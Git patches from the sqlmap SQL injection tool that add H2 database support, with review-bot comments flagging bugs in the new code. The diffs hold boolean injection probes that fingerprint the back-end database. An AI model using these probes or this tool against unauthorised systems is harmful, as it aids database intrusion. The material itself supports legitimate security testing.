Netscape/wget format") 
@@ -144,7 +144,7 @@ def cmdLineParser(argv=None): help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-code", dest="ignoreCode", type="int", - help="Ignore HTTP error code (e.g. 401)") + help="Ignore (problematic) HTTP error code (e.g. 401)") request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", help="Ignore system default proxy settings") @@ -617,7 +617,7 @@ def cmdLineParser(argv=None): help="Run host OS command(s) when SQL injection is found") miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. \"quit=N,follow=N\")") + help="Set predefined answers (e.g. \"quit=N,follow=N\")") miscellaneous.add_option("--beep", dest="beep", action="store_true", help="Beep on question and/or when SQL injection is found") diff --git a/sqlmap.conf b/sqlmap.conf index dcbe92af381..5dfc3d72d01 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -43,16 +43,16 @@ sitemapUrl = # Force usage of given HTTP method (e.g. PUT). method = -# Data string to be sent through POST. +# Data string to be sent through POST (e.g. "id=1"). data = -# Character used for splitting parameter values. +# Character used for splitting parameter values (e.g. &). paramDel = -# HTTP Cookie header value. +# HTTP Cookie header value (e.g. "PHPSESSID=a8d127e.."). cookie = -# Character used for splitting cookie values. +# Character used for splitting cookie values (e.g. ;). cookieDel = # File containing cookies in Netscape/wget format. @@ -98,7 +98,7 @@ authCred = # Syntax: key_file authFile = -# Ignore HTTP error code (e.g. 401). +# Ignore (problematic) HTTP error code (e.g. 401). # Valid: integer ignoreCode = @@ -746,7 +746,7 @@ updateAll = False # Run host OS command(s) when SQL injection is found. alert = -# Set question answers (e.g. "quit=N,follow=N"). +# Set predefined answers (e.g. "quit=N,follow=N"). answers = # Beep on question and/or when SQL injection is found. 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a7c7b5f06e8..8fd0e053a8b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fb1892f8a3902907dcd6c75f58dd80c1 lib/core/settings.py +e8b8aa7f54d6b6b57b34f933063c128f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -6458f20d6ebe20fb45a79a09c2874d33 lib/parse/cmdline.py +30d7cbada42154dcbb17f4ca969d812a lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From fb95ab8c170c1094320e81ba949ea3127d725efc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 08:02:38 +0200 Subject: [PATCH 325/428] Initial commit for #3283 (fixing H2 misidentification with PgSQL and/or HSQLDB) --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 7 +++++++ plugins/dbms/postgresql/fingerprint.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b1b8466fab8..fd209742c2e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.19" +VERSION = "1.2.10.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index fcad249f917..4fecfa648af 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -106,6 +106,13 @@ def checkDbms(self): return False else: + result = inject.checkBooleanExpression("ZERO() IS 0") # Note: check for H2 DBMS (sharing majority of same functions) + if result: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warn(warnMsg) + + return False + kb.data.has_information_schema = True Backend.setVersion(">= 1.7.2") setDbms("%s 1.7.2" % DBMS.HSQLDB) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 5860b820906..a4060687242 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -73,7 +73,7 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.PGSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("[RANDNUM]::int=[RANDNUM]") + result = inject.checkBooleanExpression("QUOTE_IDENT(NULL) IS NULL") if result: infoMsg = "confirming %s" % DBMS.PGSQL diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8fd0e053a8b..53ef4b474e0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
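Review bot: The new probe `QUOTE_IDENT(NULL) IS NULL` in plugins/dbms/postgresql/fingerprint.py replaces `[RANDNUM]::int=[RANDNUM]` without a comment saying why, so the cast-based check may later be restored as the "simpler" form. If the motive is that H2 also accepts the `::` cast and was therefore being reported as PostgreSQL (the commit subject points that way), a comment such as `# Note: "::" cast is also accepted by other DBMSes (e.g. H2), hence a PostgreSQL-specific function is probed instead (#3283)` would keep that knowledge next to the code. In the plugins/dbms/hsqldb/fingerprint.py hunk the added `ZERO() IS 0` guard is explained inline, but the user only sees "the back-end DBMS is not HSQLDB"; a `logger.debug("...or H2 DBMS is used instead")`-style line would say what was actually detected. Both checkDbms bodies begin and end outside their hunks.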
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-e8b8aa7f54d6b6b57b34f933063c128f lib/core/settings.py
+deced6d285dcd850e4e7d8e478527729 lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py
@@ -143,7 +143,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py
 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py
 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py
 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py
-aabc2b877a3696b99912bdf362c0fb69 plugins/dbms/hsqldb/fingerprint.py
+b061bdbb9159c449072fde51b444f1c0 plugins/dbms/hsqldb/fingerprint.py
 fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py
 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py
 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py
@@ -186,7 +186,7 @@ bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py
 f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py
 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py
 c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py
-c490b23b19e40e15cfbdbb026386bbd7 plugins/dbms/postgresql/fingerprint.py
+1449c89fa6dac9b62e814cc65233b9de plugins/dbms/postgresql/fingerprint.py
 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py
 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py
 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py
From 411f56e71071a200ebde76adcd45455b348d91e4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar Date: Tue, 16 Oct 2018 12:23:07 +0200 Subject: [PATCH 326/428] Initial implementation for #3283 --- lib/controller/checks.py | 5 +- lib/controller/handler.py | 4 ++ lib/core/agent.py | 6 +- lib/core/common.py | 4 +- lib/core/dicts.py | 2 + lib/core/enums.py | 2 + lib/core/settings.py | 9 ++- plugins/dbms/h2/__init__.py | 33 +++++++++ plugins/dbms/h2/connector.py | 91 ++++++++++++++++++++++++ plugins/dbms/h2/enumeration.py | 42 ++++++++++++ plugins/dbms/h2/filesystem.py | 21 ++++++ plugins/dbms/h2/fingerprint.py | 122 +++++++++++++++++++++++++++++++++ plugins/dbms/h2/syntax.py | 24 +++++++ plugins/dbms/h2/takeover.py | 31 +++++++++ plugins/generic/databases.py | 8 +-- plugins/generic/entries.py | 8 +-- txt/checksum.md5 | 27 +++++--- xml/queries.xml | 68 ++++++++++++++++++ 18 files changed, 480 insertions(+), 27 deletions(-) create mode 100644 plugins/dbms/h2/__init__.py create mode 100644 plugins/dbms/h2/connector.py create mode 100644 plugins/dbms/h2/enumeration.py create mode 100644 plugins/dbms/h2/filesystem.py create mode 100644 plugins/dbms/h2/fingerprint.py create mode 100644 plugins/dbms/h2/syntax.py create mode 100644 plugins/dbms/h2/takeover.py diff --git a/lib/controller/checks.py b/lib/controller/checks.py index fac6027e456..4ef33249b3c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -89,6 +89,7 @@ from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS +from lib.core.settings import SINGLE_QUOTE_MARKER from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS 
@@ -859,8 +860,8 @@ def heuristicCheckDbms(injection): if conf.noEscape and dbms not in FROM_DUMMY_TABLE: continue - if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)): - if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)): + if checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER)): + if not checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)): retVal = dbms break diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 6ce752dd28e..9dab40488e6 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -21,6 +21,7 @@ from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import H2_ALIASES from lib.core.settings import INFORMIX_ALIASES from lib.utils.sqlalchemy import SQLAlchemy @@ -46,6 +47,8 @@ from plugins.dbms.db2.connector import Connector as DB2Conn from plugins.dbms.hsqldb import HSQLDBMap from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn +from plugins.dbms.h2 import H2Map +from plugins.dbms.h2.connector import Connector as H2Conn from plugins.dbms.informix import InformixMap from plugins.dbms.informix.connector import Connector as InformixConn @@ -67,6 +70,7 @@ def setHandler(): (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), + (DBMS.H2, H2_ALIASES, H2Map, H2Conn), (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), ] diff --git a/lib/core/agent.py b/lib/core/agent.py index 423f66bd7bb..10ee4cfdde9 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py 
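Review bot: The switch to SINGLE_QUOTE_MARKER in heuristicCheckDbms() carries no comment explaining why the right-hand literal can no longer be written as a plain quoted string, so the indirection will look like a mistake to a later reader. The marker is only turned back into `'` in Agent.adjustLateValues() (lib/core/agent.py in this same commit), so presumably the point is to keep that literal out of the DBMS-specific escaping the rest of the payload goes through — confirm. A comment on the first changed line such as `# Note: quote marker is resolved late (Agent.adjustLateValues) so the literal is not rewritten by the DBMS escaper` would record the reason. heuristicCheckDbms continues outside the hunk.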
@@ -43,6 +43,7 @@ from lib.core.settings import NULL from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import REPLACEMENT_MARKER +from lib.core.settings import SINGLE_QUOTE_MARKER from lib.core.settings import SLEEP_TIME_MARKER from lib.core.unescaper import unescaper @@ -348,6 +349,7 @@ def adjustLateValues(self, payload): if payload: payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec)) + payload = payload.replace(SINGLE_QUOTE_MARKER, "'") for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, str(randomInt())) @@ -821,7 +823,7 @@ def limitCondition(self, expression, dump=False): limitRegExp2 = None if (limitRegExp or limitRegExp2) or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2): limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query @@ -911,7 +913,7 @@ def limitQuery(self, num, query, field=None, uniqueField=None): fromFrom = limitedQuery[fromIndex + 1:] orderBy = None - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr diff --git a/lib/core/common.py b/lib/core/common.py index 17574782212..da760545802 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -3649,7 +3649,7 @@ def safeSQLIdentificatorNaming(name, isTable=False): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): retVal = "`%s`" % retVal - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.INFORMIX, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX): retVal = "\"%s\"" % retVal elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): retVal = "\"%s\"" % retVal.upper() @@ -4275,7 +4275,7 @@ def _(value): retVal = retVal.decode("utf-16-le") except UnicodeDecodeError: pass - elif Backend.isDbms(DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.H2): try: retVal = retVal.decode("utf-16-be") except UnicodeDecodeError: diff --git a/lib/core/dicts.py b/lib/core/dicts.py index b291aeff947..5cfb8633c75 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -22,6 +22,7 @@ from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import H2_ALIASES from lib.core.settings import INFORMIX_ALIASES FIREBIRD_TYPES = { @@ -195,6 +196,7 @@ DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), + DBMS.H2: (H2_ALIASES, None, None), DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), } diff --git a/lib/core/enums.py b/lib/core/enums.py index ab21db6bdde..181cae66c17 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -43,6 +43,7 @@ class DBMS: SQLITE = "SQLite" SYBASE = "Sybase" HSQLDB = "HSQLDB" + H2 = "H2" INFORMIX = "Informix" class DBMS_DIRECTORY_NAME: 
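Review bot: In the lib/core/dicts.py hunk the new entry `DBMS.H2: (H2_ALIASES, None, None)` has three elements while every neighbouring entry has four (aliases, package, URL, SQLAlchemy dialect), so any consumer that unpacks four fields will raise ValueError on the H2 entry. It should read `DBMS.H2: (H2_ALIASES, None, None, None),`; and since the H2 connector added in this commit imports jaydebeapi and jpype exactly like the HSQLDB one, the HSQLDB package and URL values could be reused instead of None. The dict's name and the code that reads it are outside the hunk.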
@@ -57,6 +58,7 @@ class DBMS_DIRECTORY_NAME: SQLITE = "sqlite" SYBASE = "sybase" HSQLDB = "hsqldb" + H2 = "h2" INFORMIX = "informix" class CUSTOM_LOGGING: diff --git a/lib/core/settings.py b/lib/core/settings.py index fd209742c2e..e99c4a3269a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.20" +VERSION = "1.2.10.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -71,6 +71,7 @@ RANDOM_STRING_MARKER = "[RANDSTR]" SLEEP_TIME_MARKER = "[SLEEPTIME]" INFERENCE_MARKER = "[INFERENCE]" +SINGLE_QUOTE_MARKER = "[SINGLE_QUOTE]" PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" CHAR_INFERENCE_MARK = "%c" @@ -236,6 +237,7 @@ SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") +H2_SYSTEM_DBS = ("INFORMATION_SCHEMA") INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin") MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") 
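Review bot: `H2_SYSTEM_DBS = ("INFORMATION_SCHEMA")` in the lib/core/settings.py hunk is a parenthesised string, not a one-element tuple, unlike the `*_SYSTEM_DBS` tuples around it. plugins/dbms/h2/__init__.py assigns it to `self.excludeDbsList`, so a membership test against that attribute becomes a substring match on the string rather than a comparison with schema names, and iterating it yields single characters. Add the trailing comma: `H2_SYSTEM_DBS = ("INFORMATION_SCHEMA",)`.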
@@ -249,14 +251,15 @@ SYBASE_ALIASES = ("sybase", "sybase sql server") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") +H2_ALIASES = ("h2",) INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix") DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES +SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES SUPPORTED_OS = ("linux", "windows") -DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) +DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES)) USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") diff --git a/plugins/dbms/h2/__init__.py b/plugins/dbms/h2/__init__.py new file mode 100644 index 00000000000..c35662f6051 --- /dev/null +++ b/plugins/dbms/h2/__init__.py 
@@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import H2_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.h2.enumeration import Enumeration +from plugins.dbms.h2.filesystem import Filesystem +from plugins.dbms.h2.fingerprint import Fingerprint +from plugins.dbms.h2.syntax import Syntax +from plugins.dbms.h2.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class H2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines H2 methods + """ + + def __init__(self): + self.excludeDbsList = H2_SYSTEM_DBS + + Syntax.__init__(self) + Fingerprint.__init__(self) + Enumeration.__init__(self) + Filesystem.__init__(self) + Miscellaneous.__init__(self) + Takeover.__init__(self) + + unescaper[DBMS.H2] = Syntax.escape diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py new file mode 100644 index 00000000000..ee605409f27 --- /dev/null +++ b/plugins/dbms/h2/connector.py 
@@ -0,0 +1,91 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +try: + import jaydebeapi + import jpype +except: + pass + +import logging + +from lib.core.common import checkFile +from lib.core.common import readInput +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ + User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html + API: - + Debian package: - + License: LGPL & Apache License 2.0 + """ + + def __init__(self): + GenericConnector.__init__(self) + + def connect(self): + self.initConnection() + try: + msg = "what's the location of 'hsqldb.jar'? " + jar = readInput(msg) + checkFile(jar) + args = "-Djava.class.path=%s" % jar + jvm_path = jpype.getDefaultJVMPath() + jpype.startJVM(jvm_path, args) + except Exception, msg: + raise SqlmapConnectionException(msg[0]) + + try: + driver = 'org.hsqldb.jdbc.JDBCDriver' + connection_string = 'jdbc:hsqldb:mem:.' 
# 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) + self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) + except Exception, msg: + raise SqlmapConnectionException(msg[0]) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception, msg: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except Exception, msg: # TODO: fix with specific error + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + upper_query = query.upper() + + if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): + query = "VALUES %s" % query + + if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query: + query = "%s FROM (VALUES(0))" % query + + self.cursor.execute(query) + retVal = self.cursor.fetchall() + + return retVal diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py new file mode 100644 index 00000000000..2035d6f25a9 --- /dev/null +++ b/plugins/dbms/h2/enumeration.py 
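Review bot: connect() is still the HSQLDB connector: it prompts for `'hsqldb.jar'`, loads `org.hsqldb.jdbc.JDBCDriver` and connects to `'jdbc:hsqldb:mem:.'`, so a direct connection through this plugin never reaches an H2 database. The three lines should name the H2 jar and driver, e.g. `msg = "what's the location of 'h2.jar'? "`, `driver = 'org.h2.Driver'` and a `jdbc:h2:` URL built from self.hostname and self.db as the commented-out line intends (which URL form applies depends on the H2 server mode being targeted — confirm). Separately, fetchall() and execute() log `msg[1]`, which raises IndexError for any exception carrying a single argument and so hides the original error; `str(msg)` is the safer form. The bare `except: pass` around the jaydebeapi/jpype imports would be better as `except ImportError: pass`.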
@@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.enumeration import Enumeration as GenericEnumeration +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.common import unArrayizeValue +from lib.core.enums import DBMS +from lib.request import inject + +class Enumeration(GenericEnumeration): + def __init__(self): + GenericEnumeration.__init__(self) + + def getBanner(self): + if not conf.getBanner: + return + + if kb.data.banner is None: + infoMsg = "fetching banner" + logger.info(infoMsg) + + query = queries[DBMS.H2].banner.query + kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) + + return kb.data.banner + + def getPrivileges(self, *args): + warnMsg = "on H2 it is not possible to enumerate the user privileges" + logger.warn(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warn(warnMsg) diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py new file mode 100644 index 00000000000..7542ffb60cd --- /dev/null +++ b/plugins/dbms/h2/filesystem.py 
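Review bot: `getHostname` is defined both in this Enumeration class and in plugins/dbms/h2/fingerprint.py; with H2Map's base order `(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover)` the Fingerprint copy takes precedence, so the one here is never called. Keep a single definition, or if both must exist, add a comment saying which is authoritative. The warning-only method also returns None implicitly while `getPrivileges` returns `{}`; an explicit `return None` would make the contract visible.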
@@ -0,0 +1,21 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def __init__(self): + GenericFilesystem.__init__(self) + + def readFile(self, rFile): + errMsg = "on H2 it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): + errMsg = "on H2 it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py new file mode 100644 index 00000000000..d11313aff81 --- /dev/null +++ b/plugins/dbms/h2/fingerprint.py 
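Review bot: writeFile() raises with the message `"on H2 it is not possible to read files"`, copied from readFile() above it, so a user attempting a file write is told the wrong operation is unsupported. It should be `errMsg = "on H2 it is not possible to write files"`.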
